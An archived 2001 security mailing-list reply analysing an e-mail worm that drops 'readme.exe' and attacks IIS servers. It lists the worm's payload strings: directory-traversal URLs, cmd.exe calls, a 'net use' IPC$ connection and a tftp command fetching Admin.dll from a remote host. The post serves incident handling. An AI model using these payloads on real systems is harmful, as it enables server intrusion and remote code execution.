Re: New worm ??

From: Jay D. Dyson (jdysonat_private)
Date: Tue Sep 18 2001 - 09:14:47 PDT

Next message: Sean Kelly: "Website automating download of readme.eml"

Previous message: Tracey Losco: "Re: CodeBlue finally hitting, or what?"
In reply to: Cory McIntire: "New worm ??"
Next in thread: Olivier DEMBOUR: "RE: New worm ??"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 18 Sep 2001, Cory McIntire wrote:

> I and a few others I know are getting bombard on our machines with IIS
> requests....looks like another worm, and its much smarter than before,
> it seems to stay within the same class A and sometimes the same class B
> as the attacking machine is in. here is an excerpt of what i believe is
> the full scan.... 

	Here's what I've been able to determine thus far:

	There is an e-mail worm propagating right now that comes with the
payload 'readme.exe'.  I suspect this e-mail worm preys on Outlook MUAs,
but I have no confirmation of this since the e-mails I've received have
been bounces.  (Whoever released one iteration of this worm has the "From"
address as 'staffat_private'.)

	This payload does a load of things to assure its propagation.
However, it differs from other email-based worms in that it also launches
a number of web-based attacks.  Namely:

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20

	As can be seen above, it also attempts to make a tftp retrieval
for Admin.dll.

	*sigh*  Yet another worm made possible by the insecurity of
Microsoft.

- -Jay

  (    (                                                          _______
  ))   ))   .--"There's always time for a good cup of coffee"--.   >====<--.
C|~~|C|~~| (>------ Jay D. Dyson -- jdysonat_private ------<) |    = |-'
 `--' `--'  `-- What doesn't kill us only makes us stronger. --'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBO6dk6rlDRyqRQ2a9AQGaKwQAlDjzzfpgW0vqzLIjHj+z4rGJSYf4S8u6
adoqIruHbsmg+UpeeZsvSzmwnGzyKejmhPEo8QqTVtdh3aldssaDgoMLBAU+ryBE
2d38EPCG4Y/mGdd8mmCCYqtZu37oy4ZTmURiG9oOdERFFQ7y3W4IQUE8VifiAOCq
di6p4ruu1Ic=
=kS6c
-----END PGP SIGNATURE-----


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Sean Kelly: "Website automating download of readme.eml"
Previous message: Tracey Losco: "Re: CodeBlue finally hitting, or what?"
In reply to: Cory McIntire: "New worm ??"
Next in thread: Olivier DEMBOUR: "RE: New worm ??"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:44:44 PDT